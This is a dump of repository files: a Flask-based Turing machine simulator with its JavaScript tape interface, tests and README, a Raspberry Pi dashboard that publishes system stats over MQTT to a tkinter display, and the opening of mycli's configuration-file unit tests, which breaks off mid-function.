default_value = null) {\n let newCell = ribbon.insertCell(real_index_ceil);\n newCell.setAttribute('class', 'cell cell-ribbon');\n\n let input = document.createElement(\"input\");\n input.setAttribute('class', 'input input-ribbon');\n input.setAttribute('type', 'text');\n input.setAttribute('maxlength', '1');\n input.setAttribute('name', 'ribbon~' + write_index_ceil);\n input.setAttribute('autocomplete', 'off');\n if (default_value != null) {\n input.setAttribute('value', default_value);\n } else {\n input.setAttribute('value', '_');\n }\n\n //inp.setAttribute('autofocus', 'autofocus');\n newCell.append(input);\n\n let newIndexCell = index_ribbon.insertCell(real_index_ceil);\n newIndexCell.setAttribute('class', 'cell index-cell-ribbon');\n newIndexCell.innerHTML = write_index_ceil;\n}\n\nfunction checkKey(e) {\n let activeParentParent = document.activeElement.parentElement.parentElement;\n if (activeParentParent === ribbon) {\n if (e.keyCode === 37) {\n moveRibbonLeft();\n } else if (e.keyCode === 39) {\n moveRibbonRight();\n }\n } else if (activeParentParent.parentElement.parentElement.parentElement ===\n document.getElementById(\"program_machine\")) {\n if (e.keyCode === 37) {\n activeParentParent.previousElementSibling.children[0].children[0].focus();\n } else if (e.keyCode === 39) {\n activeParentParent.nextElementSibling.children[0].children[0].focus();\n } else if (e.keyCode === 38) {\n let index = activeParentParent.cellIndex\n activeParentParent.parentElement.previousElementSibling.children[index].children[0].children[0].focus();\n } else if (e.keyCode === 40) {\n let index = activeParentParent.cellIndex\n activeParentParent.parentElement.nextElementSibling.children[index].children[0].children[0].focus();\n }\n }\n}\n\nfunction moveAfterAdd(delay) {\n let difference = reallyMarginLeft - parseInt(table.style.marginLeft);\n let moveVal = Math.sign(difference) * Math.ceil(Math.abs(difference) / 8);\n\n if (widthCell / 10 <= Math.abs(difference) && Math.abs(difference) <= widthCell) {\n moveVal = Math.sign(difference) * widthCell / 10;\n }\n\n table.style.marginLeft = (parseInt(table.style.marginLeft) + moveVal).toString() + 'px';\n\n setTimeout(function () {moveAfterAdd(delay);}, delay);\n}\n\nfunction moveRibbonLeft() {\n if (reallyMarginLeft / widthCell > -1) {\n addCell(0, parseInt(index_ribbon.cells[0].innerHTML) - 1);\n table.style.marginLeft = (parseInt(table.style.marginLeft) - widthCell).toString() + 'px';\n } else {\n reallyMarginLeft += widthCell;\n --middle;\n }\n //document.write(JSON.parse(table.dataset.ribbonss));\n //document.write(table.dataset.ribbonss.toString());//table.dataset.ribbonss);\n\n ribbon.cells[middle].children[0].focus();\n}\nfunction moveRibbonRight() {\n if ((document.body.clientWidth - reallyMarginLeft) / widthCell > ribbon.cells.length - 1) {\n addCell(ribbon.cells.length, parseInt(index_ribbon.cells[ribbon.cells.length - 1].innerHTML) + 1);\n }\n\n reallyMarginLeft -= widthCell;\n ++middle;\n ribbon.cells[middle].children[0].focus();\n}\n\nfunction makeNextStep(moves, change_symbols, executed, statuses, index) {\n if (index >= moves.length) {\n return;\n }\n\n ribbon.cells[middle].children[0].setAttribute('value', change_symbols[index]);\n executed.setAttribute('value', statuses[index]);\n\n let pos_input = document.getElementById('pos');\n makeMiddleCommonIndex();\n if (moves[index] === '<') {\n moveRibbonLeft();\n //pos_input.setAttribute('value', (parseInt(pos_input.getAttribute('value')) - 1).toString());\n } else if (moves[index] === '>') {\n 
moveRibbonRight();\n //pos_input.setAttribute('value', (parseInt(pos_input.getAttribute('value')) + 1).toString());\n }\n pos_input.setAttribute('value', (middle + parseInt(index_ribbon.cells[0].innerHTML)).toString());\n makeMiddleMainIndex();\n\n timerMakeNextStepId = setTimeout(function () {\n makeNextStep(moves, change_symbols, executed, statuses, index + 1);\n }, 250);\n}\n\nfunction drawAfterLoad() {\n let ribbon_data = JSON.parse(table.dataset.ribbon);\n let ribbon_extremum = JSON.parse(table.dataset.ribbon_extremum);\n\n drawRibbon(ribbon_data, ribbon_extremum);\n\n let executed = document.getElementById(\"status\");\n let moves = JSON.parse(executed.dataset.moves);\n let statuses = JSON.parse(executed.dataset.statuses);\n let pos = parseInt(executed.dataset.pos);\n let change_symbols = JSON.parse(executed.dataset.change_symbols);\n document.getElementById('pos').setAttribute('value', pos.toString());\n\n middle += pos;\n reallyMarginLeft -= pos * widthCell;\n table.style.marginLeft = reallyMarginLeft.toString() + 'px';\n\n makeNextStep(moves, change_symbols, executed, statuses, 0);\n}\n\nfunction drawRibbon(ribbon_data, ribbon_extremum) {\n for (let i = 0; i <= ribbon_extremum['max_index']; ++i) {\n let real_index = i - parseInt(index_ribbon.cells[0].innerHTML);\n if (i <= parseInt(index_ribbon.cells[ribbon.cells.length - 1].innerHTML)) {\n ribbon.cells[real_index].children[0].setAttribute('value', ribbon_data[i]);\n } else {\n addCell(real_index, i, ribbon_data[i]);\n }\n }\n\n for (let i = -1; i >= ribbon_extremum['min_index']; --i) {\n if (i >= parseInt(index_ribbon.cells[0].innerHTML)) {\n let real_index = i - parseInt(index_ribbon.cells[0].innerHTML);\n ribbon.cells[real_index].children[0].setAttribute('value', ribbon_data[i]);\n } else {\n addCell(0, i, ribbon_data[i]);\n ++middle;\n reallyMarginLeft -= widthCell;\n table.style.marginLeft = reallyMarginLeft.toString() + 'px';\n }\n }\n}\nfunction drawBorrow() {\n document.getElementById(\"borrow\").style.marginLeft =\n (middle * widthCell - widthCell * 0.4).toString() + 'px';\n document.getElementById(\"borrow\").style.marginTop = '-70px';\n document.getElementById(\"borrow\").style.color = 'red';\n}\n\nfunction makeMiddleCommonIndex() {\n index_ribbon.cells[middle].style.fontWeight = \"500\";\n index_ribbon.cells[middle].style.fontSize = \"15px\";\n}\nfunction makeMiddleMainIndex() {\n index_ribbon.cells[middle].style.fontWeight = \"700\";\n index_ribbon.cells[middle].style.fontSize = \"20px\";\n}\n\nfunction stopMakeNextStep() {\n clearTimeout(timerMakeNextStepId);\n}" }, { "alpha_fraction": 0.5352826714515686, "alphanum_fraction": 0.5559453964233398, "avg_line_length": 44.80356979370117, "blob_id": "0000abe287a519ec4af5b8c8969afde4df5db59d", "content_id": "a8bfe5c01ce8aae5af9173f3a0a2f6f73b7f2489", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2565, "license_type": "no_license", "max_line_length": 98, "num_lines": 56, "path": "/test_flask.py", "repo_name": "aleks311001/MachineTuring", "src_encoding": "UTF-8", "text": "import unittest\nimport app\nimport re\nimport json\n\n\ndef get_elem_from_data_html(name_dict, data):\n found_name_dict = re.findall(rf'{name_dict}' + r'=\"[a-zA-Z0-9_{};:#&\\[\\]=><,.\\- ]*\"', data)[0]\n return json.loads(found_name_dict.split(name_dict + '=\"')[1][0:-1].replace('&#34;', '\"'))\n\n\nclass TestFlask(unittest.TestCase):\n def setUp(self):\n self.app = app.app.test_client()\n\n def test_default_page(self):\n response = 
self.app.get('/')\n assert response.status_code == 200\n\n data = response.data.decode('utf-8')\n assert 'value=\"_\"' in data # alphabet\n assert 'value=\"Q0\"' in data # status_alphabet\n assert set(get_elem_from_data_html('data-ribbon', data).values()) == set('_')\n assert get_elem_from_data_html('data-statuses', data) == ['Q0', ]\n assert get_elem_from_data_html('data-moves', data) == ['=', ]\n assert get_elem_from_data_html('data-change_symbols', data) == ['_', ]\n\n def test_start(self):\n response = self.app.post('/start', data={\n 'alphabet': '_1', 'status_alphabet': 'Q0 Qt',\n 'ribbon~0': '_', 'ribbon~1': '_', 'ribbon~-1': '_',\n 'input~_~Q0': '1>Qt', 'input~_~Q1': '', 'input~1~Q0': '', 'input~1~Qt': '',\n 'pos': 0, 'status': 'Q0', 'steps': 1\n }, follow_redirects=True)\n assert response.status_code == 200\n\n data = response.data.decode('utf-8')\n assert 'value=\"_1\"' in data # alphabet\n assert 'value=\"Q0 Qt\"' in data # status_alphabet\n assert set(get_elem_from_data_html('data-ribbon', data).values()) == {'0', '1', '_'}\n assert get_elem_from_data_html('data-statuses', data) == ['Qt', ]\n assert get_elem_from_data_html('data-moves', data) == [\"&gt;\", ] # '&gt;' = '>'\n assert get_elem_from_data_html('data-change_symbols', data) == ['1', ]\n\n def test_load(self):\n response = self.app.post('/load', data={'save-load': 'add1'}, follow_redirects=True)\n assert response.status_code == 200\n\n data = response.data.decode('utf-8')\n assert 'value=\"_01\"' in data # alphabet\n assert 'value=\"Q0 Q1 Q2 Qt\"' in data # status_alphabet\n assert get_elem_from_data_html('data-ribbon', data)['1'] == '1'\n assert get_elem_from_data_html('data-ribbon', data)['2'] == '0'\n assert get_elem_from_data_html('data-statuses', data) == ['Q0', ]\n assert get_elem_from_data_html('data-moves', data) == [\"=\", ]\n assert get_elem_from_data_html('data-change_symbols', data) == ['1', ]\n" }, { "alpha_fraction": 0.5500235557556152, "alphanum_fraction": 0.5537930130958557, "avg_line_length": 33.04813003540039, "blob_id": "eb2756090026db32ab613e4bfdc15f20849c2357", "content_id": "72fd449e84332f905e32e2cfc90ec3d46f54bb02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6368, "license_type": "no_license", "max_line_length": 114, "num_lines": 187, "path": "/machine_Turing.py", "repo_name": "aleks311001/MachineTuring", "src_encoding": "UTF-8", "text": "import math\n\nfrom flask import Flask, jsonify, request, redirect, send_from_directory, render_template\nfrom dataclasses import dataclass\nimport json\nimport re\n\n\n@dataclass\nclass Cell:\n input_text: str = ''\n output_text: str = ''\n execution_count: int = 0\n\n\nclass MachineTuring:\n _HTML_TEMPLATE_PATH = \"machine.html\"\n\n def __init__(self):\n self._alphabet = '_'\n self._status_alphabet = ['Q0', ]\n self._program_table = {'_': {'Q0': ''}}\n self._ribbon = {'0': '_'}\n self._ribbon_extremum = {'min_index': 0, 'max_index': 0}\n self._status = 'Q0'\n self._pos_ribbon = 0\n self._move = '='\n\n self._moves = [self._move, ]\n self._pos_start = self._pos_ribbon\n self._change_symbols = [self._ribbon[str(self._pos_start)], ]\n self._statuses = [self._status, ]\n self._before_ribbon = self._ribbon\n\n def clear(self):\n self.__init__()\n\n def clear_story(self):\n self._moves = [\"=\", ]\n self._pos_start = self._pos_ribbon\n self._change_symbols = [self._ribbon[str(self._pos_start)], ]\n self._statuses = [self._status, ]\n self._before_ribbon = self._ribbon\n\n def create_dict(self):\n result 
= dict(alphabet=self._alphabet, status_alphabet=' '.join(self._status_alphabet),\n program_table=self.make_program_table(), ribbon_cells=json.dumps(self._before_ribbon),\n ribbon_extremum=json.dumps(self._ribbon_extremum),\n pos_start=self._pos_start, moves=json.dumps(self._moves),\n change_symbols=json.dumps(self._change_symbols), statuses=json.dumps(self._statuses))\n\n self.clear_story()\n return result\n\n def render(self):\n return render_template(self._HTML_TEMPLATE_PATH, **self.create_dict())\n\n def make_program_table(self):\n result = dict()\n result['line_status'] = self._status_alphabet\n\n result['lines'] = dict()\n for symbol in self._alphabet:\n line = dict()\n\n line['symbol'] = symbol\n if symbol == ' ':\n line['symbol'] = '˽'\n\n line['cells'] = dict()\n for status in self._status_alphabet:\n line['cells'][status] = self._program_table[symbol][status]\n line['index_cells'] = self._status_alphabet\n\n result['lines'][symbol] = line\n\n result['index_lines'] = self._alphabet\n\n return result\n\n def update_alphabet(self):\n new_alphabet = request.form.get('alphabet')\n\n for symbol in set(new_alphabet) ^ set(self._alphabet):\n if symbol not in self._program_table:\n self._program_table[symbol] = dict()\n for status in self._status_alphabet:\n self._program_table[symbol][status] = ''\n else:\n self._program_table.pop(symbol)\n\n self._alphabet = new_alphabet\n\n def update_status_alphabet(self):\n new_status_alphabet = str(request.form.get('status_alphabet')).split(' ')\n\n for symbol in self._program_table:\n for status in set(new_status_alphabet) ^ set(self._status_alphabet):\n if status in self._status_alphabet:\n self._program_table[symbol].pop(status)\n else:\n self._program_table[symbol][status] = ''\n\n self._status_alphabet = new_status_alphabet\n\n def load_program_table_and_ribbon(self):\n self._status = request.form.get('status')\n self._pos_ribbon = int(request.form.get('pos'))\n\n for item in request.form:\n name = item.split('~')\n if name[0] == 'ribbon':\n index = name[1]\n self._ribbon[index] = request.form.get(item)\n elif name[0] == 'input':\n self._program_table[name[1]][name[2]] = request.form.get(item)\n\n self._ribbon_extremum['min_index'] = min(int(i) for i in self._ribbon.keys())\n self._ribbon_extremum['max_index'] = max(int(i) for i in self._ribbon.keys())\n\n def update_all(self):\n self.update_alphabet()\n self.update_status_alphabet()\n self.load_program_table_and_ribbon()\n self.clear_story()\n\n def start(self, steps):\n self._before_ribbon = self._ribbon.copy()\n self._moves = list()\n self._pos_start = self._pos_ribbon\n self._change_symbols = list()\n self._statuses = list()\n\n last_pos = self._pos_ribbon\n step = 0\n while step < steps and self.next_step():\n self._moves.append(self._move)\n self._change_symbols.append(self._ribbon[str(last_pos)])\n self._statuses.append(self._status)\n last_pos = self._pos_ribbon\n step += 1\n\n def next_step(self):\n program = self._program_table[self._ribbon[str(self._pos_ribbon)] or ' '][self._status]\n move = re.findall(r'[<=>]', program)\n if len(move) == 0:\n return False\n else:\n self._move = move[0]\n\n self._ribbon[str(self._pos_ribbon)] = program.split(self._move)[0]\n self._status = program.split(self._move)[1]\n\n self.check_not_extremum_cell()\n\n if self._status not in self._status_alphabet or self._ribbon[str(self._pos_ribbon)] not in self._alphabet:\n return False\n\n if self._move == '<':\n self._pos_ribbon -= 1\n elif self._move == '>':\n self._pos_ribbon += 1\n\n return True\n\n def 
check_not_extremum_cell(self):\n if self._pos_ribbon == self._ribbon_extremum['max_index']:\n self._ribbon_extremum['max_index'] += 1\n self._ribbon[str(self._ribbon_extremum['max_index'])] = '_'\n if self._pos_ribbon == self._ribbon_extremum['min_index']:\n self._ribbon_extremum['min_index'] -= 1\n self._ribbon[str(self._ribbon_extremum['min_index'])] = '_'\n\n def save(self, name):\n filename = 'machines/' + name + '.json'\n\n with open(filename, 'w') as file:\n json.dump(self.__dict__, file, indent=4)\n\n def load(self, name):\n filename = 'machines/' + name + '.json'\n\n with open(filename, 'r') as file:\n machine = dict(json.load(file))\n\n for key in machine.keys():\n self.__setattr__(key, machine[key])\n" }, { "alpha_fraction": 0.7571574449539185, "alphanum_fraction": 0.7632924318313599, "avg_line_length": 68.89286041259766, "blob_id": "183eb13726977b0633391cdb95455236d22d2180", "content_id": "895e31c14f47da871b7b801de3c184186d559816", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3379, "license_type": "no_license", "max_line_length": 107, "num_lines": 28, "path": "/README.md", "repo_name": "aleks311001/MachineTuring", "src_encoding": "UTF-8", "text": "# Turing Machine\n\nTo start the server use: \"_python3 app.py_\"; to run the tests: \"_pytest_\"\n\nWhen you open the Turing machine, you will see several fields:\n\n1. **Symbol alphabet.** The set of symbols that can be printed on the tape\n(the symbols of this alphabet must be single characters entered without spaces;\nthe service characters \"<\", \"=\", \">\", \"~\" are also forbidden here);\n2. **State alphabet.** The set of machine states (they may be multi-character and must\nbe listed separated by spaces; words containing service characters are forbidden here as well).\nTo update the table from item 6 according to the alphabets, press \"Update\";\n3. **Machine tape.** A tape, infinite in both directions, that the Turing machine works on\n(you can move along it with the arrow keys, or simply click the cell you need with the mouse);\n4. **Two fields with the current state and position;**\n5. **Field with the number of steps.** The machine stops if it has not reached a terminating state\nwithin this many steps after the start. There are also three buttons here:\n - \"Start\" - run the machine for the given number of steps;\n - \"Next step\" - make 1 step (equivalent to Start 1);\n - \"Stop\" - force the machine to stop;\n6. **Table for programming the machine.** Here, for every pair (tape symbol, state), you specify\nwhat the machine must do, in this format: <new symbol that replaces the current one><direction of\nmovement: \"<\" - left, \"=\" - stay in place, \">\" - right><new state after the move>.\nIf a field is left empty, the machine stops when it reaches it (this is how terminating states\ncan be made - an empty column)\n7. **Field with the machine name.** Here you can enter the name of your machine to save it (\"Save\")\nor load it (\"Load\") (you can also load several examples whose names are listed under this field);\n8. **\"Clear\" button.** A button for clearing the entered data." } ]
6
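Note on the transition format described in the README above: machine_Turing.py's next_step splits each program cell on the single move character found by re.findall(r'[<=>]', program). A minimal sketch of that parse, using the "1>Qt" transition that test_flask.py's test_start submits:

import re

program = "1>Qt"                         # one cell of the program table
move = re.findall(r'[<=>]', program)[0]  # '>': move the head right
new_symbol = program.split(move)[0]      # '1': symbol written onto the tape
new_state = program.split(move)[1]       # 'Qt': state after the move
print(new_symbol, move, new_state)       # -> 1 > Qt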
venice84/rpi-dashboard
https://github.com/venice84/rpi-dashboard
d1ff5580ab3ca87d0024742cfa26b3b2e4580cb8
f92bcba5d86cb8b5f6716ef0e9df36c02dbdf5c5
529be620055b333f91d75f8a24b1e2a6af6a11da
refs/heads/master
2022-04-16T10:37:29.578445
2020-04-13T19:25:57
2020-04-13T19:25:57
255,413,703
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5142378807067871, "alphanum_fraction": 0.589614748954773, "avg_line_length": 59.70000076293945, "blob_id": "9ff940f2b34434706ce90d90fe193e34f42251ce", "content_id": "8fe4511f305176c6ab35f55ed5475892993eb675", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 597, "license_type": "no_license", "max_line_length": 84, "num_lines": 10, "path": "/start_sensoriraspberry.sh", "repo_name": "venice84/rpi-dashboard", "src_encoding": "UTF-8", "text": "#!/bin/bash\nraspcpu=$(top -bn 2 -d 0.01 | grep 'Cpu(s)' | tail -n 1 | awk '{print $2+$4+$6}')\nuptime=$(uptime | awk '{print int($3+$5/1440),\"giorni\"}')\ndisco_occ=$(df -h | grep /dev/root | awk '{print $5}')\nram_occ=$(free -m | awk 'FNR == 2 {print int($3/$2*100)}')\n\nmosquitto_pub -h 192.168.x.x -m \"$raspcpu\" -t raspcpu -u 'user' -P 'password' -r\nmosquitto_pub -h 192.168.x.x -m \"$uptime\" -t uptime -u 'user' -P 'password' -r\nmosquitto_pub -h 192.168.x.x -m \"$disco_occ\" -t disco_occ -u 'user' -P 'password' -r\nmosquitto_pub -h 192.168.x.x -m \"$ram_occ\" -t ram_occ -u 'user' -P 'password' -r\n" }, { "alpha_fraction": 0.8043912053108215, "alphanum_fraction": 0.8078842163085938, "avg_line_length": 57.764705657958984, "blob_id": "1c9b8a698f8aebc102eed4a8320ef957885d72f8", "content_id": "89d4b260387d37eb7714beee17994936ed71b0ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2016, "license_type": "no_license", "max_line_length": 353, "num_lines": 34, "path": "/README.md", "repo_name": "venice84/rpi-dashboard", "src_encoding": "UTF-8", "text": "# rpi-dashboard\n\nI have to start with a disclaimer: I am not a programmer and this launcher was created as a pastime. ;)\nI am sure it is neither elegant nor optimized, but it does exactly what I was looking for.\n\nThe goal was to use my raspberry with an osoyoo 3.5\" display, so that I could show\ncontinuously updating cards. I could have done it with homeassistant and its web page, but chromium works really badly on a small display, and performance is poor. With a future 7-inch display I can think about an interface with buttons and many more labels. The dark theme is necessary for better visibility.\n\nThe currently published program needs:\n\n- an mqtt server installed as a docker container (or installed directly on the raspberry);\n- an mqtt client installed (sudo apt-get install mosquitto-clients)\n- cron to refresh the mqtt values at regular intervals\n- python to build the window with tkinter and paho mqtt\n\nIt is compatible with Python v2.x and 3.x (with a few small changes), and the following modules are required:\n\npip3 install setuptools\npip3 install paho-mqtt\n\nEvery minute the raspberry runs, via crontab:\n\n/bin/sh /start_sensoriraspberry.sh\n\nThe idea keeps evolving: next I will aim to integrate it with homeassistant to build a home control panel that is not web-based, for the reasons already given above.\n\nThe cards you see are examples; via mqtt you can feed in any result coming from the command line:\n\n- raspberry sensors,\n- data coming from websites using curl,\n- mqtt sensors from tasmota devices\n- other sensors using homeassistant as the main platform (it gathers countless plugins inside it), publishing topics to mqtt through its configuration.\n\nSince I regularly use Homeassistant for home automation, I would like to integrate this launcher with some sensors already present in home assistant, via mqtt.\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.639104425907135, "alphanum_fraction": 0.6597206592559814, "avg_line_length": 35.67479705810547, "blob_id": "795eb13613047ac5fbb8a17e8862094b84471f9e", "content_id": "d5a25604cd8a941e899c2bfcea45585549c00cf8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4511, "license_type": "no_license", "max_line_length": 150, "num_lines": 123, "path": "/launcher4.0.0.py", "repo_name": "venice84/rpi-dashboard", "src_encoding": "UTF-8", "text": "from tkinter import * #Tkinter for python 2x\r\nimport time # reads the time\r\nimport locale # time conversion\r\nimport logging # for logging\r\nimport threading # multi processes\r\nfrom threading import Thread\r\nimport subprocess\r\nfrom uptime import *\r\nimport paho.mqtt.client as mqtt\r\n\r\n#start window\r\nroot = Tk() #call root window\r\n\r\n#initialise var\r\nup=''\r\ntime1=''\r\n\r\n#log error\r\n#logging.basicConfig(filename='launcher.log', level=logging.DEBUG, format='%(asctime)s %(levelname)s %(name)s %(message)s')\r\n#logger=logging.getLogger(__name__)\r\n\r\n##chiudi = PhotoImage(file=\"chiudi.png\") #TO INSERT AN IMAGE\r\nchiudi ='CHIUDI'\r\n\r\n#def window and locales\r\nlocale.setlocale(locale.LC_ALL, '') # translation months in correct utc format\r\n\r\n#-------------------------TESTING WINDOW PARAMETERS----------------------------\r\n#w, h = root.winfo_screenwidth(), root.winfo_screenheight()\r\nroot.geometry(\"450x400+300+300\")\r\n#root.geometry('%sx%s' % (w, h))\r\n#root.attributes(\"-fullscreen\", True) #fullscreen\r\n#---------------------------------------------------------------------------\r\n\r\nroot.bind('<Escape>',lambda e: root.destroy()) # destroy main window with esc\r\nroot.configure(background='black') # black wallpaper\r\nroot.config(cursor=\"none\") # no mouse pointer\r\n\r\n################ MAIN WINDOW LEVEL ################\r\n\r\n\r\nlabel_clock = Label(root, font=('DejaVu Sans', 100, 'bold'), fg='white',bg='black')\r\nlabel_clock.grid(row=0, columnspan=3)\r\n\r\nlabel_date = Label(root, font=('DejaVu Sans', 25), 
fg='white',bg='black')\r\nlabel_date.grid(row=1,columnspan=3)\r\n\r\nbutton_chiudi = Button(root, font=('DejaVu Sans', 8), borderwidth=1, fg='white',bg='black',relief=\"solid\", text='v. 4.0 exit', command = root.destroy)\r\nbutton_chiudi.grid(row=2,columnspan=3)\r\n\r\nlabel_info0 = Label(root, font=('DejaVu Sans', 30), fg='white',bg='black', borderwidth=1, relief=\"solid\", text=\"cpu\")\r\nlabel_info0.grid(row=3, column=0)\r\n\r\nlabel_info1 = Label(root, font=('DejaVu Sans', 30), fg='white',bg='black', borderwidth=1, relief=\"solid\", text=\"uptime\")\r\nlabel_info1.grid(row=3,column=1)\r\n\r\nlabel_info2= Label(root, font=('DejaVu Sans', 30), fg='white',bg='black', borderwidth=1, relief=\"solid\", text=\"disk\")\r\nlabel_info2.grid(row=4, column=0)\r\n\r\nlabel_info3 = Label(root, font=('DejaVu Sans', 30), fg='white',bg='black', borderwidth=1, relief=\"solid\", text=\"domani\")\r\nlabel_info3.grid(row=4,column=1)\r\n\r\n#MQTT UPDATE CPU: displays the mqtt messages\r\ndef on_message_raspcpu(client, userdata, message):\r\n cpu='freq '+str(message.payload.decode(\"utf-8\")+'%')\r\n label_info0.config(text=cpu)\r\n\r\n#MQTT UPDATE DISK USAGE: displays the mqtt messages\r\ndef on_message_disco_occ(client, userdata, message):\r\n disk='disk '+str(message.payload.decode(\"utf-8\"))\r\n label_info2.config(text=disk)\r\n\r\n#MQTT RAM USAGE: displays the mqtt messages\r\ndef on_message_ram_occ(client, userdata, message):\r\n ram='ram '+str(message.payload.decode(\"utf-8\")+'%')\r\n label_info3.config(text=ram)\r\n \r\n#MQTT DEFAULT settings\r\nbroker_address=\"192.168.x.x\"\r\nuser = \"user\"\r\npassword = \"password\"\r\nclient = mqtt.Client(\"Python\") #create new instance\r\nclient.username_pw_set(user, password=password)\r\n\r\n#MQTT DEFINE TOPICS: each reading goes to a different callback based on its topic (even though everything is subscribed)\r\nclient.message_callback_add('raspcpu', on_message_raspcpu)\r\nclient.message_callback_add('disco_occ', on_message_disco_occ)\r\nclient.message_callback_add('ram_occ', on_message_ram_occ)\r\nclient.connect(broker_address) #connect to broker so the messages show up\r\nclient.loop_start()\r\n\r\n#listen to everything - a single sub-category can also be filtered\r\nclient.subscribe(\"#\")\r\n\r\n##########process number 2 - updates the uptime##########\r\ndef update_uptime():\r\n up=' upt '+str(round(uptime()/86400,2))+'gg'\r\n label_info1.config(text=up)\r\n #print(time.strftime('%S')) #for checking\r\n root.after(6000, update_uptime) #creates the loop\r\n\r\n\r\n##########process number 1 - updates the clock##########\r\ndef update_time():\r\n global time1\r\n ora_ora = time.strftime('%H:%M')\r\n data_ora = time.strftime('%d %B %Y', time.localtime())\r\n \r\n label_clock.config(text=ora_ora)\r\n label_date.config(text=data_ora)\r\n #print(time.strftime('%S')) #for checking\r\n root.after(6000, update_time) #creates the loop\r\n\r\n\r\n#multiprocessing\r\nif __name__ == '__main__':\r\n T1=Thread(target = update_time)\r\n T2=Thread(target = update_uptime)\r\n T1.setDaemon(True)\r\n T2.setDaemon(True)\r\n T1.start()\r\n T2.start()\r\nroot.mainloop()\r\n" } ]
3
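The rpi-dashboard README above pairs a cron-driven mosquitto_pub publisher with paho-mqtt callbacks in the tkinter launcher. A minimal standalone sketch of the subscriber side, mirroring the wiring in launcher4.0.0.py (the broker address and credentials are placeholders, exactly as in the repository):

import paho.mqtt.client as mqtt

def on_message_raspcpu(client, userdata, message):
    # same decode the launcher's label callbacks use
    print('freq ' + message.payload.decode('utf-8') + '%')

client = mqtt.Client('Python')
client.username_pw_set('user', password='password')
client.message_callback_add('raspcpu', on_message_raspcpu)
client.connect('192.168.x.x')
client.subscribe('#')   # listen to every topic, as the launcher does
client.loop_forever()   # blocking variant of the launcher's loop_start()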
kongzhidea/mycli
https://github.com/kongzhidea/mycli
5796d58b6ce28b9feb4c52b8d7df10d5c54933f2
f8045fef05b7b701014a7f82f08e49d11bf92b40
5e127f70e9851e88aeb2b96c5cd5e3aed5d2e37a
refs/heads/master
2020-12-31T07:10:48.737969
2018-11-27T11:38:39
2018-11-27T11:38:39
86,579,644
1
0
NOASSERTION
2017-03-29T12:30:44
2017-03-29T12:30:46
2018-11-27T11:38:40
Python
[ { "alpha_fraction": 0.6315270662307739, "alphanum_fraction": 0.6371921300888062, "avg_line_length": 28, "blob_id": "d241355f0da984a30e60b245935d35d477e3ce3b", "content_id": "81a9ee4f7524f39b3767cfd52fcdaab099a91b01", "detected_licenses": [ "MIT", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4060, "license_type": "permissive", "max_line_length": 78, "num_lines": 140, "path": "/test/test_config.py", "repo_name": "kongzhidea/mycli", "src_encoding": "UTF-8", "text": "\"\"\"Unit tests for the mycli.config module.\"\"\"\nfrom io import BytesIO, TextIOWrapper\nimport os\nimport struct\nimport sys\nimport tempfile\nimport pytest\n\nfrom mycli.config import (get_mylogin_cnf_path, open_mylogin_cnf,\n read_and_decrypt_mylogin_cnf, str_to_bool)\n\nLOGIN_PATH_FILE = os.path.abspath(os.path.join(os.path.dirname(__file__),\n 'mylogin.cnf'))\n\n\ndef open_bmylogin_cnf(name):\n \"\"\"Open contents of *name* in a BytesIO buffer.\"\"\"\n with open(name, 'rb') as f:\n buf = BytesIO()\n buf.write(f.read())\n return buf\n\n\ndef test_read_mylogin_cnf():\n \"\"\"Tests that a login path file can be read and decrypted.\"\"\"\n mylogin_cnf = open_mylogin_cnf(LOGIN_PATH_FILE)\n\n assert isinstance(mylogin_cnf, TextIOWrapper)\n\n contents = mylogin_cnf.read()\n for word in ('[test]', 'user', 'password', 'host', 'port'):\n assert word in contents\n\n\ndef test_decrypt_blank_mylogin_cnf():\n \"\"\"Test that a blank login path file is handled correctly.\"\"\"\n mylogin_cnf = read_and_decrypt_mylogin_cnf(BytesIO())\n assert mylogin_cnf is None\n\n\ndef test_corrupted_login_key():\n \"\"\"Test that a corrupted login path key is handled correctly.\"\"\"\n buf = open_bmylogin_cnf(LOGIN_PATH_FILE)\n\n # Skip past the unused bytes\n buf.seek(4)\n\n # Write null bytes over half the login key\n buf.write(b'\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0')\n\n buf.seek(0)\n mylogin_cnf = read_and_decrypt_mylogin_cnf(buf)\n\n assert mylogin_cnf is None\n\n\ndef test_corrupted_pad():\n \"\"\"Tests that a login path file with a corrupted pad is partially read.\"\"\"\n buf = open_bmylogin_cnf(LOGIN_PATH_FILE)\n\n # Skip past the login key\n buf.seek(24)\n\n # Skip option group\n len_buf = buf.read(4)\n cipher_len, = struct.unpack(\"<i\", len_buf)\n buf.read(cipher_len)\n\n # Corrupt the pad for the user line\n len_buf = buf.read(4)\n cipher_len, = struct.unpack(\"<i\", len_buf)\n buf.read(cipher_len - 1)\n buf.write(b'\\0')\n\n buf.seek(0)\n mylogin_cnf = TextIOWrapper(read_and_decrypt_mylogin_cnf(buf))\n contents = mylogin_cnf.read()\n for word in ('[test]', 'password', 'host', 'port'):\n assert word in contents\n assert 'user' not in contents\n\n\ndef test_get_mylogin_cnf_path():\n \"\"\"Tests that the path for .mylogin.cnf is detected.\"\"\"\n original_env = None\n if 'MYSQL_TEST_LOGIN_FILE' in os.environ:\n original_env = os.environ.pop('MYSQL_TEST_LOGIN_FILE')\n is_windows = sys.platform == 'win32'\n\n login_cnf_path = get_mylogin_cnf_path()\n\n if original_env is not None:\n os.environ['MYSQL_TEST_LOGIN_FILE'] = original_env\n\n if login_cnf_path is not None:\n assert login_cnf_path.endswith('.mylogin.cnf')\n\n if is_windows is True:\n assert 'MySQL' in login_cnf_path\n else:\n home_dir = os.path.expanduser('~')\n assert login_cnf_path.startswith(home_dir)\n\n\ndef test_alternate_get_mylogin_cnf_path():\n \"\"\"Tests that the alternate path for .mylogin.cnf is detected.\"\"\"\n original_env = None\n if 'MYSQL_TEST_LOGIN_FILE' in os.environ:\n original_env = 
